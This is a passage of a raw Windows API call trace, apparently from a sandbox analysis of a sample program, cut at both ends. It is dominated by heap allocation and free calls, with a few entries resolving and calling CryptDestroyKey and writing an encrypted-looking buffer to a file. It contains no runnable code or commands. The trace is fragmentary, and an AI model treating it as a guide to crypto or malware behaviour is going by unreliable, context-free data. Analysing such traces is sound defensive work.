dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0209.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0209.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0209.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0209.695] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0209.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0209.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0209.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0209.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0209.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0209.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0209.695] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0209.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0209.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0209.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0209.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0209.695] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0209.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0209.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0209.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0209.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0209.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0209.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0209.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0209.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0209.696] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0209.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0209.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0209.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0209.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0209.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0209.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0209.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0209.696] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0209.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0209.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0209.782] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0209.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0209.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0209.783] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0209.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0209.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0209.783] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0209.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0209.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0209.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0209.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0209.783] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0209.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0209.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0209.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0209.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0209.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0209.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0209.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0209.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0209.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0209.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0209.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0209.783] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0209.783] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0209.783] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0209.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0209.783] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0209.784] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0209.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0209.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0209.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0209.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0209.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0209.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0209.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0209.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0209.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0209.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0209.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0209.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d28) returned 0x2f3f4d8 [0209.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0209.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0209.784] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d28) returned 0x2e80330 [0209.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0209.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0209.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3f4d8 | out: hHeap=0x970000) returned 1 [0209.787] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0209.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0209.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0209.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0209.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0209.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d28) returned 0x2f3f4d8 [0209.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80330 | out: hHeap=0x970000) returned 1 [0209.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0209.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0209.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x6d28) returned 0x2e80330 [0209.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3f4d8 | out: hHeap=0x970000) returned 1 [0209.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0209.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0209.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0209.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0209.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0209.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0209.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0209.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0209.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0209.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0209.788] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0209.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0209.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0209.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0209.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0209.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0209.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0209.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0209.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0209.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0209.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0209.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0209.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0209.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0209.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0209.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0209.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0209.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0209.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0209.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0209.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0209.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0209.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0209.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f387a8 | out: hHeap=0x970000) returned 1 [0209.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0209.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0209.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0209.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0209.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0209.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0209.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0209.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0209.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0209.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0209.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0209.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0209.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0209.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0209.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0209.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0209.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0209.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f31a78 | out: hHeap=0x970000) returned 1 [0209.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0209.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0209.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0209.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0209.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0209.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f46208 | out: hHeap=0x970000) returned 1 [0209.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0209.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0209.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0209.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0209.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0209.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0209.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0209.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0209.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0209.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0209.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0209.800] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0209.801] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f2ad48*, nNumberOfBytesToWrite=0x6d28, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f2ad48*, lpNumberOfBytesWritten=0x8cf5e4*=0x6d28, lpOverlapped=0x0) returned 1 [0209.804] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0209.804] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0209.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0209.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0209.804] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0209.804] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0209.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0209.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0209.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0209.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0209.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0209.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0209.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0209.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0209.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0209.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0209.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0209.805] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0209.805] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0209.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0209.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0209.805] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0209.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0209.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0209.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0209.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0209.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0209.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0209.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e508d8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0209.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0209.806] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0209.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0209.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0209.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0209.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0209.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0209.806] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0209.806] CryptDestroyKey (hKey=0xa87110) returned 1 [0209.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0209.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0209.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0209.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0209.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0209.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0209.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0209.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0209.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0209.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0209.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0209.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0209.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0209.807] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0209.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0209.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0209.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0209.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0209.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0209.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0209.807] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0209.807] HeapFree (in: 